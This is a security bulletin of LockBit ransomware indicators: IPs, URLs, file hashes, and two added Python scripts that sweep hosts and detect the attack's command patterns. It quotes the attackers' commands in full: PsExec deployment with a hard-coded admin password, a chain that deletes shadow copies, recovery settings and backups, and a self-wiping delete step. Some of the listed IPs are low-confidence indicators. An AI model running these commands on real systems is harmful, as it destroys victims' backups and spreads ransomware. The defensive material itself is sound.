These IOCs were identified in association with a "LockBit" ransomware infection. As additional information is developed, it will be incorporated in a follow-on bulletin.

Malicious IPs

Malicious SSL connections from: 94.177.123.135

VirusTotal engines detected malware coming from this IP: 185.94.111.1 


IPs with at least one VirusTotal hit in the last 30 days. A single detection is a low-confidence indicator, and several of the addresses below sit in ranges used by large mail, CDN and web providers, so confirm ownership and the observed activity before blocking them.

5.61.58.15

23.227.38.65

202.173.30.250

35.213.109.249

95.217.64.181

54.249.66.39

52.58.78.16

95.211.189.151

104.47.5.36

104.47.14.33

162.250.5.81

74.125.21.139

64.233.177.100

31.13.66.35

204.85.32.26

35.212.95.174

151.101.249.140

74.125.136.100

144.76.96.236

173.243.138.98

161.117.125.216

139.224.38.16

194.190.117.32

77.88.21.90

194.190.117.33

217.69.133.145



Malicious URLs (Note: http(s) replaced with hxxp(s))

hxxp://cts.hotbar.com/trackedevent.aspx - No available date - Declared malicious by VirusTotal

hxxps://web.archive.org/web/20061108171731/http://www.newyorker.com:80/fact/content/articles/031013fa_fact - 12/31/2019 - Declared malicious by VirusTotal



MD5 Hash of Malicious Files

Malicious File Name(s)              MD5 Hash
resources.exe                       bc366664baf8ff887d501fc5b491e5ca
RepMgr.exe                          f24374753619cdf62ab5a480964b275b
$FCAE3AF3.doc                       2239ee1cafe2ef10448be9a7966ebb5a
Excel.exe                           92bae235d5526fcd506129cf6a83c870
Readerdc_en_db_cra_install(1).exe   c3012b659e4d289077b21cd1acb9f6eb
Explorer.exe                        4e196cea0c9c46a7d656c67e52e8c7c7
Zoom_71a8493382fd3b8a.exe           f013b05218ae55da38e7e8bc82471fab

Several of these names mimic legitimate software (Explorer.exe, Excel.exe, Zoom); match on the hash, not the file name.
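The following Python script is added here as an example and is not part of the bulletin. It shows how to sweep a host against the indicators above: it refangs the hxxp URLs, validates and de-duplicates the IP list (the bulletin's list repeats 95.211.189.151 and 64.233.177.100), hashes every file under a directory against the MD5 table, and matches firewall-style log lines against the IP set. The IP list in the script is a subset of the bulletin's. The log lines, their src=/dst= format, the sample file and its MD5 (the hash of the bytes "abc") are constructed for the demonstration.

```python
"""Sweep files and connection logs against the IOCs in this bulletin (added example)."""
import hashlib
import ipaddress
import os
import re
import tempfile

# Indicators copied from the bulletin.  The IP list is a subset and keeps the
# bulletin's duplicate entries so normalize_ips() has something to collapse.
BULLETIN_IPS = [
    "94.177.123.135", "185.94.111.1", "5.61.58.15", "23.227.38.65",
    "95.211.189.151", "95.211.189.151", "64.233.177.100", "64.233.177.100",
]
BULLETIN_URLS = ["hxxp://cts.hotbar.com/trackedevent.aspx"]
BULLETIN_MD5 = {
    "bc366664baf8ff887d501fc5b491e5ca": "resources.exe",
    "f24374753619cdf62ab5a480964b275b": "RepMgr.exe",
    "2239ee1cafe2ef10448be9a7966ebb5a": "$FCAE3AF3.doc",
    "92bae235d5526fcd506129cf6a83c870": "Excel.exe",
    "c3012b659e4d289077b21cd1acb9f6eb": "Readerdc_en_db_cra_install(1).exe",
    "4e196cea0c9c46a7d656c67e52e8c7c7": "Explorer.exe",
    "f013b05218ae55da38e7e8bc82471fab": "Zoom_71a8493382fd3b8a.exe",
}


def refang(url):
    """Turn the bulletin's hxxp(s):// defanging back into a real scheme."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url.strip(), flags=re.IGNORECASE)


def normalize_ips(raw):
    """Validate entries as IP addresses, drop duplicates, preserve order."""
    seen, out = set(), []
    for entry in raw:
        try:
            ip = str(ipaddress.ip_address(entry.strip()))
        except ValueError:
            continue  # skip garbled entries rather than blocking on them
        if ip not in seen:
            seen.add(ip)
            out.append(ip)
    return out


def md5_of_file(path, chunk=1 << 20):
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep_files(root, hashes):
    """Walk root; return (path, bulletin_name) for each MD5 match."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = md5_of_file(path)
            except OSError:
                continue  # locked or unreadable file: move on
            if digest in hashes:
                hits.append((path, hashes[digest]))
    return hits


# Assumed log format: key=value fields carrying src= and dst= (constructed, not incident data).
LOG_RE = re.compile(r"\bsrc=(?P<src>\S+)\s+dst=(?P<dst>\S+)")


def match_connections(log_lines, ips):
    """Return log lines whose src or dst address is a bulletin IP."""
    bad = set(ips)
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and (m["src"] in bad or m["dst"] in bad):
            hits.append(line)
    return hits


def demo():
    """Run the sweep on constructed data; returns (unique_ip_count, conn_hits, file_hit_names)."""
    ips = normalize_ips(BULLETIN_IPS)
    logs = [  # constructed firewall-style lines
        "2020-05-01T10:00:01Z src=10.0.0.5 dst=94.177.123.135 dport=443 action=allow",
        "2020-05-01T10:00:02Z src=10.0.0.5 dst=8.8.8.8 dport=53 action=allow",
        "2020-05-01T10:00:03Z src=185.94.111.1 dst=10.0.0.9 dport=445 action=deny",
    ]
    conn_hits = match_connections(logs, ips)
    # Constructed sample: MD5(b"abc") is added to the table so the walk produces a hit.
    hashes = {**BULLETIN_MD5, "900150983cd24fb0d6963f7d28e17f72": "constructed-sample.bin"}
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "sample.bin"), "wb") as f:
            f.write(b"abc")
        with open(os.path.join(tmp, "clean.txt"), "wb") as f:
            f.write(b"nothing to see here")
        file_hits = sweep_files(tmp, hashes)
    return len(ips), conn_hits, [name for _, name in file_hits]


if __name__ == "__main__":
    unique, conns, files = demo()
    print(f"{unique} unique IPs, {len(conns)} connection hits, files: {files}")
    print([refang(u) for u in BULLETIN_URLS])
```

Point sweep_files at a user profile or C:\Windows\Temp on a suspect host and feed match_connections your own export; the hash lookup is exact-match only, so a recompiled or padded payload will not be caught by it.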




LockBit Scripts/Files Identified

Script 1: start PsExec.exe -d @C:\Windows\Temp\list.txt -u [Insert victim agency name].local\[Insert admin name] -p System2017 cmd /c "C:\windows\temp\[Insert victim agency name].exe"

Script 2: start PsExec.exe @C:\Windows\Temp\list.txt -u [Insert victim agency name].local\[Insert admin name] -p System2017 cmd /c COPY "\\[Insert targeted IP address]\Windows\Temp\[Insert victim agency name].exe" "C:\windows\temp\"

Both scripts drive PsExec with a host list (@C:\Windows\Temp\list.txt) and a hard-coded domain administrator credential: Script 2 copies the payload from a staging share into each host's C:\windows\temp, and Script 1 launches it on every listed host without waiting for it to finish (-d). The host list, a PsExec binary in C:\Windows\Temp and the password System2017 are all worth hunting for.

C:\Windows\Temp\list.txt
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

This chain deletes all Volume Shadow Copies (via both vssadmin and WMI), disables the Windows Recovery Environment and boot-failure prompts, and deletes the Windows Backup catalog, so the victim cannot roll back encrypted files. Child processes observed:


conhost.exe   \??\C:\Windows\system32\conhost.exe -xffffffff -ForceV1

vssadmin.exe  vssadmin delete shadows /all /quiet

wmic.exe      wmic shadowcopy delete

bcdedit.exe   bcdedit /set {default} bootstatuspolicy ignoreallfailures

bcdedit.exe   bcdedit /set {default} recoveryenabled no

mmc.exe       delete catalog -quiet


mshta.exe c:\Users\(Current)\Desktop\LockBit-note.hta 


cmd.exe /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Administrator\Documents\[Insert victim agency name]\[Insert victim agency name].exe" & Del /f /q "C:\Users\Administrator\Documents\[Insert victim agency name]\[Insert victim agency name].exe"

This is the self-removal step: the ping to 127.0.0.7 acts as a short delay so the parent process can exit, fsutil overwrites the first 524288 bytes (512 KB) of the executable with zeros, and Del removes the file, leaving little of the payload for forensic recovery. Preserve memory and the MFT/$LogFile on affected hosts before rebooting, since the on-disk binary is likely gone. Child processes observed:

conhost.exe   \??\C:\Windows\system32\conhost.exe -xffffffff -ForceV1

ping.exe      127.0.0.7 -n 3

fsutil.exe    fsutil file setZeroData offset=0 length=524288 "C:\Users\Administrator\Documents\[Insert victim agency name]\[Insert victim agency name].exe"
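Added example, not from the bulletin: a small Python detector that turns the command lines above into rules and runs them over constructed Sysmon-style process-creation events. The events, host names (WS01, DC01, WS02, WS03), user names and paths are made up for the demonstration; the rule patterns are derived from the bulletin's command lines. The benign ping event at the end shows that the rules key on the full command chain rather than on cmd.exe or ping alone.

```python
"""Flag the LockBit command patterns from this bulletin in process-creation telemetry (added example)."""
import re
from collections import defaultdict

# Each rule: (name, regex applied to the lower-cased command line).
# Patterns follow the command lines listed in the bulletin.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete")),
    ("boot_recovery_disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)")),
    ("backup_catalog_deleted",
     re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog")),
    ("psexec_hostlist_with_password",        # PsExec fed a host list and a cleartext -p password
     re.compile(r"psexec(\.exe)?.*@\S+\.txt.*\s-p\s")),
    ("self_wipe_fsutil_del",                  # zero the binary, then delete it
     re.compile(r"fsutil(\.exe)?\s+file\s+setzerodata.*&\s*del\s+/f\s+/q")),
    ("ransom_note_hta",
     re.compile(r"mshta(\.exe)?\s+.*\.hta\b")),
]


def classify(cmdline):
    """Return the names of every rule matched by one command line."""
    lowered = cmdline.lower()
    return [name for name, rx in RULES if rx.search(lowered)]


def score_hosts(events):
    """events: iterable of dicts with host, image, cmdline.
    Returns {host: {"rules": set, "events": [(image, [rule, ...]), ...]}} for hosts with hits."""
    findings = defaultdict(lambda: {"rules": set(), "events": []})
    for ev in events:
        hits = classify(ev["cmdline"])
        if hits:
            findings[ev["host"]]["rules"].update(hits)
            findings[ev["host"]]["events"].append((ev["image"], hits))
    return dict(findings)


# Constructed Sysmon-style events (hosts, users and paths are invented, not incident telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & "
                "bcdedit /set {default} bootstatuspolicy ignoreallfailures & "
                "bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"},
    {"host": "WS01", "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe c:\\Users\\jdoe\\Desktop\\LockBit-note.hta"},
    {"host": "DC01", "image": "C:\\Windows\\Temp\\PsExec.exe",
     "cmdline": "PsExec.exe -d @C:\\Windows\\Temp\\list.txt -u corp.local\\admin -p System2017 "
                "cmd /c \"C:\\windows\\temp\\payload.exe\""},
    {"host": "WS02", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "
                "\"C:\\Users\\Administrator\\Documents\\x.exe\" & Del /f /q \"C:\\Users\\Administrator\\Documents\\x.exe\""},
    {"host": "WS03", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c ping 127.0.0.1 -n 3"},  # benign: must not match
]


def run_sample():
    """Score the constructed events; WS03 should be absent from the result."""
    return score_hosts(SAMPLE_EVENTS)


if __name__ == "__main__":
    for host, info in run_sample().items():
        print(host, sorted(info["rules"]))
```

In production, feed score_hosts the CommandLine field from Sysmon Event ID 1 or Windows 4688 (with command-line auditing enabled) and alert on any host that trips shadow_copy_deletion or boot_recovery_disabled; the PsExec rule also gives you the host list path and the credential to rotate.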